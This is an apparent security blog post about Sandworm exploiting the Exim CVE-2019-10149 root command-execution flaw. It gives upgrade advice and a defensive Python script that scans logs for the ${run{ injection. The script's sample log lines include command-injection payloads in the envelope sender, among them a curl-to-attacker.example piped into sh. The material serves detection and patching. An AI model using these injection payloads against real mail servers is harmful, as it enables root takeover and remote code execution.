You can practically hear the Russian hacking group Sandworm, aka BlackEnergy, yelling “No mercy!” at their computers as they successfully exploit a vulnerability in Exim mail servers.
According to the NSA, a bug (CVE-2019-10149) in the open-source Exim Mail Transfer Agent (MTA), the software that accepts mail from local and remote users and then routes and delivers it, lets a remote, unauthenticated attacker run commands on the mail server as root. With root, the intruders can install programs, create new accounts, and view or change any data they like. And to make matters even worse? It’s also wormable: the exploit can be automated so that one compromised server goes on to attack the next.
And while this was patched almost a year ago (the fix shipped in Exim 4.92), the NSA announced just last week that Sandworm/BlackEnergy has been exploiting unpatched servers by sending SMTP messages with a command smuggled into the “MAIL FROM” (envelope sender) field. Once a server is exploited, the group downloads and executes a malicious shell script that not only gives them access to the mail on the box, but also lets them:
- Install more malware
- Add privileged users
- Disable network security settings
- Update SSH configurations to enable additional remote access
To protect yourself, run Exim 4.93 or later, the minimum the NSA recommends: the vulnerable versions are 4.87 through 4.91, and 4.92 itself was followed by further serious fixes, so anything the server reports below 4.93 should be treated as overdue for an upgrade.
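As an added example (not code from the original article or from the NSA advisory), the Python snippet below shows the two quick checks that the exploit description and the version advice above suggest: scanning Exim log lines for the `${run{...}}` string-expansion syntax that CVE-2019-10149 exploits inject into an envelope address, and comparing the banner printed by `exim -bV` against the 4.93 minimum. The log lines and version banners are constructed for illustration; the hostnames, IPs and exact field layout are assumptions, not captured data.

```python
import re

# Exim's ${run{...}} string-expansion operator. The public CVE-2019-10149
# exploits plant it inside an envelope address (e.g. "${run{/bin/sh -c ...}}@localhost")
# so that Exim expands it, and runs the command as root, while delivering.
EXPANSION_PATTERN = re.compile(r"\$\{\s*run\s*\{", re.IGNORECASE)

# Minimum version recommended above (and by the NSA advisory).
MINIMUM_VERSION = (4, 93)

# Constructed sample log lines, NOT real Exim output: lines 1 and 3 mimic a
# rejectlog entry whose F=<sender> field carries the expansion payload,
# line 2 is an ordinary, benign mainlog delivery record.
SAMPLE_LOG_LINES = [
    '2020-05-28 10:01:02 H=(example) [203.0.113.5] '
    'F=<${run{/bin/sh -c "wget http://attacker.example/ip"}}@localhost> '
    'rejected RCPT <root@victim.example>',
    '2020-05-28 10:01:05 1jeXYZ-0001aB-Cd <= alice@example.org '
    'H=mail.example.org [198.51.100.7] P=esmtp S=1234',
    "2020-05-28 10:02:00 H=(evil) [203.0.113.9] "
    "F=<${run{/bin/sh -c 'curl http://attacker.example/x | sh'}}@localhost> "
    "rejected RCPT <postmaster@victim.example>",
]


def find_expansion_injection(lines):
    """Return (line_number, line) for every log line containing ${run{ syntax.

    A legitimate e-mail address never contains Exim expansion syntax, so any
    hit in an envelope field is worth an incident-response look.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        if EXPANSION_PATTERN.search(line):
            hits.append((number, line))
    return hits


def parse_exim_version(bv_output):
    """Extract (major, minor) from the first line of `exim -bV` output.

    'Exim version 4.92 #3 built 11-Jun-2019 ...' -> (4, 92).
    Patch levels such as 4.92.3 are deliberately reduced to (4, 92), because
    the advice above is to be on 4.93 or later, not on a patched 4.92.
    """
    match = re.search(r"Exim version (\d+)\.(\d+)", bv_output)
    if not match:
        raise ValueError("unrecognised exim -bV output: %r" % bv_output)
    return int(match.group(1)), int(match.group(2))


def is_version_acceptable(bv_output, minimum=MINIMUM_VERSION):
    """True when the reported Exim version meets the recommended minimum."""
    return parse_exim_version(bv_output) >= minimum


if __name__ == "__main__":
    # On a real server you would feed in `exim -bV` output and /var/log/exim4/*;
    # here both are constructed.
    for number, line in find_expansion_injection(SAMPLE_LOG_LINES):
        print("suspicious envelope address on line %d: %s" % (number, line))
    for banner in ("Exim version 4.92 #3 built 11-Jun-2019 14:47:45",
                   "Exim version 4.93 #1 built 01-Dec-2019 10:00:00"):
        verdict = "ok" if is_version_acceptable(banner) else "UPGRADE"
        print("%s -> %s" % (banner.split(" #")[0], verdict))
```

The regex check is a coarse indicator, not a replacement for patching: it catches the well-known payload shape in whatever log fields your Exim configuration records, but an attacker who has already run commands as root may also have tampered with the logs themselves, which is why the version check comes first.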
You have heard us say it before and you will undoubtedly hear it again from us… Make sure your software is up to date. Yes, it can be a pain sometimes, but not as big a pain as handing Russian spies full access to your emails and your work devices.